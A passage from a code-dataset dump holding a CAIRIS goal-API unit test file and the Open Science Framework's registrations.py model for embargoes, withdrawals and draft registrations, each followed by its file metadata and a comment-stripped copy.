self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d', method, env_id)
goal_to_update = self.prepare_new_goal()
goal_to_update.theName = 'Edited test goal'
goal_to_update.theId = env_id
upd_env_body = self.prepare_json(goal=goal_to_update)
rv = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=upd_env_body, content_type='application/json')
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp)
self.assertIsInstance(json_resp, dict)
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s', method, message)
self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')
rv = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
upd_goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(upd_goal, 'Unable to decode JSON data')
self.logger.debug('[%s] Response data: %s', method, rv.data)
self.logger.info('[%s] Goal: %s [%d]\n', method, upd_goal['theName'], upd_goal['theId'])
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
def prepare_new_goal(self):
new_goal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_subgoal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_goal_props = [
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_1,
lbl='Test 1',
definition='This is a first test property',
category=self.existing_category,
priority='Medium',
fitCriterion='None',
issue='None',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
),
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_2,
lbl='Test 2',
definition='This is a second test property',
category=self.existing_category,
priority='Low',
fitCriterion='None',
issue='Test issue',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
)
]
new_goal = Goal(
goalId=-1,
goalName='Test goal',
goalOrig='',
tags=['test', 'test123'],
environmentProperties=[]
)
new_goal.theEnvironmentProperties = new_goal_props
new_goal.theEnvironmentDictionary = {}
new_goal.theGoalPropertyDictionary = {}
delattr(new_goal, 'theEnvironmentDictionary')
delattr(new_goal, 'theGoalPropertyDictionary')
return new_goal
def prepare_dict(self, goal=None):
if goal is None:
goal = self.prepare_new_goal()
else:
assert isinstance(goal, Goal)
return {
'session_id': 'test',
'object': goal,
}
def prepare_json(self, data_dict=None, goal=None):
if data_dict is None:
data_dict = self.prepare_dict(goal=goal)
else:
assert isinstance(data_dict, dict)
new_goal_body = jsonpickle.encode(data_dict, unpicklable=False)
self.logger.info('JSON data: %s', new_goal_body)
return new_goal_body
| 38.71875 | 152 | 0.684769 |
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
@classmethod
def setUpClass(cls):
importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')
def setUp(self):
self.logger = logging.getLogger(__name__)
self.existing_goal_name = 'Multi-Factor Authentication'
self.existing_category = 'Maintain'
self.existing_environment_name_1 = 'Stroke'
self.existing_environment_name_2 = 'Psychosis'
self.goal_class = Goal.__module__+'.'+Goal.__name__
self.to_delete_ids = []
def test_get_all(self):
method = 'test_get_all'
rv = self.app.get('/api/goals?session_id=test')
goals = jsonpickle.decode(rv.data)
self.assertIsNotNone(goals, 'No results after deserialization')
self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
self.assertGreater(len(goals), 0, 'No goals in the dictionary')
self.logger.info('[%s] Goals found: %d', method, len(goals))
goal = goals.values()[0]
self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_get_by_name(self):
method = 'test_get_by_name'
url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
rv = self.app.get(url)
self.assertIsNotNone(rv.data, 'No response')
self.logger.debug('[%s] Response data: %s', method, rv.data)
goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(goal, 'No results after deserialization')
self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_delete(self):
method = 'test_delete'
url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
new_goal_body = self.prepare_json()
self.app.delete(url)
self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
self.logger.info('[%s] URL: %s', method, url)
rv = self.app.delete(url)
self.logger.info('[%s] Response data: %s', method, rv.data)
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s\n', method, message)
def test_post(self):
method = 'test_post'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d\n', method, env_id)
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
def test_put(self):
method = 'test_put'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d', method, env_id)
goal_to_update = self.prepare_new_goal()
goal_to_update.theName = 'Edited test goal'
goal_to_update.theId = env_id
upd_env_body = self.prepare_json(goal=goal_to_update)
rv = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=upd_env_body, content_type='application/json')
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp)
self.assertIsInstance(json_resp, dict)
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s', method, message)
self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')
rv = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
upd_goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(upd_goal, 'Unable to decode JSON data')
self.logger.debug('[%s] Response data: %s', method, rv.data)
self.logger.info('[%s] Goal: %s [%d]\n', method, upd_goal['theName'], upd_goal['theId'])
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
def prepare_new_goal(self):
new_goal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_subgoal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_goal_props = [
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_1,
lbl='Test 1',
definition='This is a first test property',
category=self.existing_category,
priority='Medium',
fitCriterion='None',
issue='None',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
),
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_2,
lbl='Test 2',
definition='This is a second test property',
category=self.existing_category,
priority='Low',
fitCriterion='None',
issue='Test issue',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
)
]
new_goal = Goal(
goalId=-1,
goalName='Test goal',
goalOrig='',
tags=['test', 'test123'],
environmentProperties=[]
)
new_goal.theEnvironmentProperties = new_goal_props
new_goal.theEnvironmentDictionary = {}
new_goal.theGoalPropertyDictionary = {}
delattr(new_goal, 'theEnvironmentDictionary')
delattr(new_goal, 'theGoalPropertyDictionary')
return new_goal
def prepare_dict(self, goal=None):
if goal is None:
goal = self.prepare_new_goal()
else:
assert isinstance(goal, Goal)
return {
'session_id': 'test',
'object': goal,
}
def prepare_json(self, data_dict=None, goal=None):
if data_dict is None:
data_dict = self.prepare_dict(goal=goal)
else:
assert isinstance(data_dict, dict)
new_goal_body = jsonpickle.encode(data_dict, unpicklable=False)
self.logger.info('JSON data: %s', new_goal_body)
return new_goal_body
| true | true |
f725eb967997a72b04e8458957fc69f1e97cbee0 | 24,951 | py | Python | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | import logging
import datetime
import urlparse
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import PermissionsError
from osf.utils.fields import NonNaiveDateTimeField
from osf.exceptions import NodeStateError
from website.util import api_v2_url
from website import settings
from website.archiver import ARCHIVER_INITIATED
from osf.models import (
OSFUser, RegistrationSchema,
Retraction, Embargo, DraftRegistrationApproval,
EmbargoTerminationApproval,
)
from osf.models.archive import ArchiveJob
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.node import AbstractNode
from osf.models.nodelog import NodeLog
from osf.models.provider import RegistrationProvider
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
logger = logging.getLogger(__name__)
class Registration(AbstractNode):
WRITABLE_WHITELIST = [
'article_doi',
'description',
'is_public',
'node_license',
'category',
]
provider = models.ForeignKey('RegistrationProvider', related_name='registrations', null=True)
registered_date = NonNaiveDateTimeField(db_index=True, null=True, blank=True)
registered_user = models.ForeignKey(OSFUser,
related_name='related_to',
on_delete=models.SET_NULL,
null=True, blank=True)
registered_schema = models.ManyToManyField(RegistrationSchema)
registered_meta = DateTimeAwareJSONField(default=dict, blank=True)
registered_from = models.ForeignKey('self',
related_name='registrations',
on_delete=models.SET_NULL,
null=True, blank=True)
# Sanctions
registration_approval = models.ForeignKey('RegistrationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
retraction = models.ForeignKey('Retraction',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo = models.ForeignKey('Embargo',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo_termination_approval = models.ForeignKey('EmbargoTerminationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
files_count = models.PositiveIntegerField(blank=True, null=True)
@staticmethod
def find_failed_registrations():
expired_if_before = timezone.now() - settings.ARCHIVE_TIMEOUT_TIMEDELTA
node_id_list = ArchiveJob.objects.filter(sent=False, datetime_initiated__lt=expired_if_before, status=ARCHIVER_INITIATED).values_list('dst_node', flat=True)
root_nodes_id = AbstractNode.objects.filter(id__in=node_id_list).values_list('root', flat=True).distinct()
stuck_regs = AbstractNode.objects.filter(id__in=root_nodes_id, is_deleted=False)
return stuck_regs
@property
def registered_schema_id(self):
if self.registered_schema.exists():
return self.registered_schema.first()._id
return None
@property
def is_registration(self):
"""For v1 compat."""
return True
@property
def is_stuck_registration(self):
return self in self.find_failed_registrations()
@property
def is_collection(self):
"""For v1 compat."""
return False
@property
def archive_job(self):
return self.archive_jobs.first() if self.archive_jobs.count() else None
@property
def sanction(self):
root = self._dirty_root
sanction = (
root.embargo_termination_approval or
root.retraction or
root.embargo or
root.registration_approval
)
if sanction:
return sanction
else:
return None
@property
def is_registration_approved(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_approved
@property
def is_pending_embargo(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.is_pending_approval
@property
def is_pending_embargo_for_existing_registration(self):
""" Returns True if Node has an Embargo pending approval for an
existing registrations. This is used specifically to ensure
registrations pre-dating the Embargo feature do not get deleted if
their respective Embargo request is rejected.
"""
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.pending_registration
@property
def is_retracted(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_approved
@property
def is_pending_registration(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_pending_approval
@property
def is_pending_retraction(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_pending_approval
@property
def is_pending_embargo_termination(self):
root = self._dirty_root
if root.embargo_termination_approval is None:
return False
return root.embargo_termination_approval.is_pending_approval
@property
def is_embargoed(self):
"""A Node is embargoed if:
- it has an associated Embargo record
- that record has been approved
- the node is not public (embargo not yet lifted)
"""
root = self._dirty_root
if root.is_public or root.embargo is None:
return False
return root.embargo.is_approved
@property
def embargo_end_date(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.embargo_end_date
@property
def archiving(self):
job = self.archive_job
return job and not job.done and not job.archive_tree_finished()
@property
def _dirty_root(self):
"""Equivalent to `self.root`, but don't let Django fetch a clean copy
when `self == self.root`. Use when it's important to reflect unsaved
state rather than database state.
"""
if self.id == self.root_id:
return self
return self.root
def date_withdrawn(self):
return getattr(self.root.retraction, 'date_retracted', None)
@property
def withdrawal_justification(self):
return getattr(self.root.retraction, 'justification', None)
def _initiate_embargo(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
"""Initiates the retraction process for a registration
:param user: User who initiated the retraction
:param end_date: Date when the registration should be made public
"""
end_date_midnight = datetime.datetime.combine(
end_date,
datetime.datetime.min.time()
).replace(tzinfo=end_date.tzinfo)
self.embargo = Embargo.objects.create(
initiated_by=user,
end_date=end_date_midnight,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete
)
self.save() # Set foreign field reference Node.embargo
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.embargo.add_authorizer(admin, node)
self.embargo.save() # Save embargo's approval_state
return self.embargo
def embargo_registration(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
"""Enter registration into an embargo period at end of which, it will
be made public
:param user: User initiating the embargo
:param end_date: Date when the registration should be made public
:raises: NodeStateError if Node is not a registration
:raises: PermissionsError if user is not an admin for the Node
:raises: ValidationError if end_date is not within time constraints
"""
if not self.is_admin_contributor(user):
raise PermissionsError('Only admins may embargo a registration')
if not self._is_embargo_date_valid(end_date):
if (end_date - timezone.now()) >= settings.EMBARGO_END_DATE_MIN:
raise ValidationError('Registrations can only be embargoed for up to four years.')
raise ValidationError('Embargo end date must be at least three days in the future.')
embargo = self._initiate_embargo(user, end_date,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete)
self.registered_from.add_log(
action=NodeLog.EMBARGO_INITIATED,
params={
'node': self.registered_from._id,
'registration': self._id,
'embargo_id': embargo._id,
},
auth=Auth(user),
save=True,
)
if self.is_public:
self.set_privacy('private', Auth(user))
def request_embargo_termination(self, auth):
"""Initiates an EmbargoTerminationApproval to lift this Embargoed Registration's
embargo early."""
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
if not self.root == self:
raise NodeStateError('Only the root of an embargoed registration can request termination')
approval = EmbargoTerminationApproval(
initiated_by=auth.user,
embargoed_registration=self,
)
admins = [admin for admin in self.root.get_admin_contributors_recursive(unique_users=True)]
for (admin, node) in admins:
approval.add_authorizer(admin, node=node)
approval.save()
approval.ask(admins)
self.embargo_termination_approval = approval
self.save()
return approval
def terminate_embargo(self, auth):
"""Handles the actual early termination of an Embargoed registration.
Adds a log to the registered_from Node.
"""
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
self.registered_from.add_log(
action=NodeLog.EMBARGO_TERMINATED,
params={
'project': self._id,
'node': self.registered_from._id,
'registration': self._id,
},
auth=None,
save=True
)
self.embargo.mark_as_completed()
for node in self.node_and_primary_descendants():
node.set_privacy(
self.PUBLIC,
auth=None,
log=False,
save=True
)
return True
def _initiate_retraction(self, user, justification=None):
"""Initiates the retraction process for a registration
:param user: User who initiated the retraction
:param justification: Justification, if given, for retraction
"""
self.retraction = Retraction.objects.create(
initiated_by=user,
justification=justification or None, # make empty strings None
state=Retraction.UNAPPROVED
)
self.save()
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.retraction.add_authorizer(admin, node)
self.retraction.save() # Save retraction approval state
return self.retraction
def retract_registration(self, user, justification=None, save=True):
"""Retract public registration. Instantiate new Retraction object
and associate it with the respective registration.
"""
if not self.is_public and not (self.embargo_end_date or self.is_pending_embargo):
raise NodeStateError('Only public or embargoed registrations may be withdrawn.')
if self.root_id != self.id:
raise NodeStateError('Withdrawal of non-parent registrations is not permitted.')
retraction = self._initiate_retraction(user, justification)
self.registered_from.add_log(
action=NodeLog.RETRACTION_INITIATED,
params={
'node': self.registered_from._id,
'registration': self._id,
'retraction_id': retraction._id,
},
auth=Auth(user),
)
self.retraction = retraction
if save:
self.save()
return retraction
def copy_unclaimed_records(self):
"""Copies unclaimed_records to unregistered contributors from the registered_from node"""
registered_from_id = self.registered_from._id
for contributor in self.contributors.filter(is_registered=False):
record = contributor.unclaimed_records.get(registered_from_id)
if record:
contributor.unclaimed_records[self._id] = record
contributor.save()
def delete_registration_tree(self, save=False):
logger.debug('Marking registration {} as deleted'.format(self._id))
self.is_deleted = True
for draft_registration in DraftRegistration.objects.filter(registered_node=self):
# Allow draft registration to be submitted
if draft_registration.approval:
draft_registration.approval = None
draft_registration.save()
if not getattr(self.embargo, 'for_existing_registration', False):
self.registered_from = None
if save:
self.save()
self.update_search()
for child in self.nodes_primary:
child.delete_registration_tree(save=save)
def update_files_count(self):
# Updates registration files_count at archival success or
# at the end of forced (manual) archive for restarted (stuck or failed) registrations.
field = AbstractNode._meta.get_field('modified')
field.auto_now = False
self.files_count = self.files.filter(deleted_on__isnull=True).count()
self.save()
field.auto_now = True
def add_tag(self, tag, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tag(tag, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def add_tags(self, tags, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tags(tags, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def remove_tag(self, tag, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tag(tag, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
def remove_tags(self, tags, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tags(tags, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
class Meta:
# custom permissions for use in the OSF Admin App
permissions = (
('view_registration', 'Can view registration details'),
)
class DraftRegistrationLog(ObjectIDMixin, BaseModel):
""" Simple log to show status changes for DraftRegistrations
field - _id - primary key
field - date - date of the action took place
field - action - simple action to track what happened
field - user - user who did the action
"""
date = NonNaiveDateTimeField(default=timezone.now)
action = models.CharField(max_length=255)
draft = models.ForeignKey('DraftRegistration', related_name='logs',
null=True, blank=True, on_delete=models.CASCADE)
user = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
SUBMITTED = 'submitted'
REGISTERED = 'registered'
APPROVED = 'approved'
REJECTED = 'rejected'
def __repr__(self):
return ('<DraftRegistrationLog({self.action!r}, date={self.date!r}), '
'user={self.user!r} '
'with id {self._id!r}>').format(self=self)
class DraftRegistration(ObjectIDMixin, BaseModel):
URL_TEMPLATE = settings.DOMAIN + 'project/{node_id}/drafts/{draft_id}'
datetime_initiated = NonNaiveDateTimeField(auto_now_add=True)
datetime_updated = NonNaiveDateTimeField(auto_now=True)
deleted = NonNaiveDateTimeField(null=True, blank=True)
# Original Node a draft registration is associated with
branched_from = models.ForeignKey('Node', related_name='registered_draft',
null=True, on_delete=models.CASCADE)
initiator = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
provider = models.ForeignKey('RegistrationProvider', related_name='draft_registrations', null=True)
# Dictionary field mapping question id to a question's comments and answer
# {
# <qid>: {
# 'comments': [{
# 'user': {
# 'id': <uid>,
# 'name': <name>
# },
# value: <value>,
# lastModified: <datetime>
# }],
# 'value': <value>
# }
# }
registration_metadata = DateTimeAwareJSONField(default=dict, blank=True)
registration_schema = models.ForeignKey('RegistrationSchema', null=True, on_delete=models.CASCADE)
registered_node = models.ForeignKey('Registration', null=True, blank=True,
related_name='draft_registration', on_delete=models.CASCADE)
approval = models.ForeignKey('DraftRegistrationApproval', null=True, blank=True, on_delete=models.CASCADE)
# Dictionary field mapping extra fields defined in the RegistrationSchema.schema to their
# values. Defaults should be provided in the schema (e.g. 'paymentSent': false),
# and these values are added to the DraftRegistration
# TODO: Use "FIELD_ALIASES"?
_metaschema_flags = DateTimeAwareJSONField(default=dict, blank=True)
notes = models.TextField(blank=True)
def __repr__(self):
return ('<DraftRegistration(branched_from={self.branched_from!r}) '
'with id {self._id!r}>').format(self=self)
# lazily set flags
@property
def flags(self):
if not self._metaschema_flags:
self._metaschema_flags = {}
meta_schema = self.registration_schema
if meta_schema:
schema = meta_schema.schema
flags = schema.get('flags', {})
dirty = False
for flag, value in flags.items():
if flag not in self._metaschema_flags:
self._metaschema_flags[flag] = value
dirty = True
if dirty:
self.save()
return self._metaschema_flags
@flags.setter
def flags(self, flags):
self._metaschema_flags.update(flags)
@property
def url(self):
return self.URL_TEMPLATE.format(
node_id=self.branched_from._id,
draft_id=self._id
)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def absolute_api_v2_url(self):
node = self.branched_from
path = '/nodes/{}/draft_registrations/{}/'.format(node._id, self._id)
return api_v2_url(path)
# used by django and DRF
def get_absolute_url(self):
return self.absolute_api_v2_url
@property
def requires_approval(self):
return self.registration_schema.requires_approval
@property
def is_pending_review(self):
return self.approval.is_pending_approval if (self.requires_approval and self.approval) else False
@property
def is_approved(self):
if self.requires_approval:
if not self.approval:
return bool(self.registered_node)
else:
return self.approval.is_approved
else:
return False
@property
def is_rejected(self):
if self.requires_approval:
if not self.approval:
return False
else:
return self.approval.is_rejected
else:
return False
@property
def status_logs(self):
""" List of logs associated with this node"""
return self.logs.all().order_by('date')
@classmethod
def create_from_node(cls, node, user, schema, data=None, provider=None):
if not provider:
provider = RegistrationProvider.load('osf')
draft = cls(
initiator=user,
branched_from=node,
registration_schema=schema,
registration_metadata=data or {},
provider=provider,
)
draft.save()
return draft
def update_metadata(self, metadata):
changes = []
# Prevent comments on approved drafts
if not self.is_approved:
for question_id, value in metadata.items():
old_value = self.registration_metadata.get(question_id)
if old_value:
old_comments = {
comment['created']: comment
for comment in old_value.get('comments', [])
}
new_comments = {
comment['created']: comment
for comment in value.get('comments', [])
}
old_comments.update(new_comments)
metadata[question_id]['comments'] = sorted(
old_comments.values(),
key=lambda c: c['created']
)
if old_value.get('value') != value.get('value'):
changes.append(question_id)
else:
changes.append(question_id)
self.registration_metadata.update(metadata)
return changes
def submit_for_review(self, initiated_by, meta, save=False):
approval = DraftRegistrationApproval(
meta=meta
)
approval.save()
self.approval = approval
self.add_status_log(initiated_by, DraftRegistrationLog.SUBMITTED)
if save:
self.save()
def register(self, auth, save=False, child_ids=None):
node = self.branched_from
# Create the registration
register = node.register_node(
schema=self.registration_schema,
auth=auth,
data=self.registration_metadata,
child_ids=child_ids,
provider=self.provider
)
self.registered_node = register
self.add_status_log(auth.user, DraftRegistrationLog.REGISTERED)
if save:
self.save()
return register
def approve(self, user):
self.approval.approve(user)
self.refresh_from_db()
self.add_status_log(user, DraftRegistrationLog.APPROVED)
self.approval.save()
def reject(self, user):
self.approval.reject(user)
self.add_status_log(user, DraftRegistrationLog.REJECTED)
self.approval.save()
def add_status_log(self, user, action):
log = DraftRegistrationLog(action=action, user=user, draft=self)
log.save()
def validate_metadata(self, *args, **kwargs):
"""
Validates draft's metadata
"""
return self.registration_schema.validate_metadata(*args, **kwargs)
| 37.633484 | 164 | 0.624945 | import logging
import datetime
import urlparse
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import PermissionsError
from osf.utils.fields import NonNaiveDateTimeField
from osf.exceptions import NodeStateError
from website.util import api_v2_url
from website import settings
from website.archiver import ARCHIVER_INITIATED
from osf.models import (
OSFUser, RegistrationSchema,
Retraction, Embargo, DraftRegistrationApproval,
EmbargoTerminationApproval,
)
from osf.models.archive import ArchiveJob
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.node import AbstractNode
from osf.models.nodelog import NodeLog
from osf.models.provider import RegistrationProvider
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
logger = logging.getLogger(__name__)
class Registration(AbstractNode):
WRITABLE_WHITELIST = [
'article_doi',
'description',
'is_public',
'node_license',
'category',
]
provider = models.ForeignKey('RegistrationProvider', related_name='registrations', null=True)
registered_date = NonNaiveDateTimeField(db_index=True, null=True, blank=True)
registered_user = models.ForeignKey(OSFUser,
related_name='related_to',
on_delete=models.SET_NULL,
null=True, blank=True)
registered_schema = models.ManyToManyField(RegistrationSchema)
registered_meta = DateTimeAwareJSONField(default=dict, blank=True)
registered_from = models.ForeignKey('self',
related_name='registrations',
on_delete=models.SET_NULL,
null=True, blank=True)
registration_approval = models.ForeignKey('RegistrationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
retraction = models.ForeignKey('Retraction',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo = models.ForeignKey('Embargo',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo_termination_approval = models.ForeignKey('EmbargoTerminationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
files_count = models.PositiveIntegerField(blank=True, null=True)
@staticmethod
def find_failed_registrations():
expired_if_before = timezone.now() - settings.ARCHIVE_TIMEOUT_TIMEDELTA
node_id_list = ArchiveJob.objects.filter(sent=False, datetime_initiated__lt=expired_if_before, status=ARCHIVER_INITIATED).values_list('dst_node', flat=True)
root_nodes_id = AbstractNode.objects.filter(id__in=node_id_list).values_list('root', flat=True).distinct()
stuck_regs = AbstractNode.objects.filter(id__in=root_nodes_id, is_deleted=False)
return stuck_regs
@property
def registered_schema_id(self):
if self.registered_schema.exists():
return self.registered_schema.first()._id
return None
@property
def is_registration(self):
return True
@property
def is_stuck_registration(self):
return self in self.find_failed_registrations()
@property
def is_collection(self):
return False
@property
def archive_job(self):
return self.archive_jobs.first() if self.archive_jobs.count() else None
@property
def sanction(self):
root = self._dirty_root
sanction = (
root.embargo_termination_approval or
root.retraction or
root.embargo or
root.registration_approval
)
if sanction:
return sanction
else:
return None
@property
def is_registration_approved(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_approved
@property
def is_pending_embargo(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.is_pending_approval
@property
def is_pending_embargo_for_existing_registration(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.pending_registration
@property
def is_retracted(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_approved
@property
def is_pending_registration(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_pending_approval
@property
def is_pending_retraction(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_pending_approval
@property
def is_pending_embargo_termination(self):
root = self._dirty_root
if root.embargo_termination_approval is None:
return False
return root.embargo_termination_approval.is_pending_approval
@property
def is_embargoed(self):
root = self._dirty_root
if root.is_public or root.embargo is None:
return False
return root.embargo.is_approved
@property
def embargo_end_date(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.embargo_end_date
@property
def archiving(self):
job = self.archive_job
return job and not job.done and not job.archive_tree_finished()
@property
def _dirty_root(self):
if self.id == self.root_id:
return self
return self.root
def date_withdrawn(self):
return getattr(self.root.retraction, 'date_retracted', None)
@property
def withdrawal_justification(self):
return getattr(self.root.retraction, 'justification', None)
def _initiate_embargo(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
end_date_midnight = datetime.datetime.combine(
end_date,
datetime.datetime.min.time()
).replace(tzinfo=end_date.tzinfo)
self.embargo = Embargo.objects.create(
initiated_by=user,
end_date=end_date_midnight,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete
)
self.save()
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.embargo.add_authorizer(admin, node)
self.embargo.save()
return self.embargo
def embargo_registration(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
if not self.is_admin_contributor(user):
raise PermissionsError('Only admins may embargo a registration')
if not self._is_embargo_date_valid(end_date):
if (end_date - timezone.now()) >= settings.EMBARGO_END_DATE_MIN:
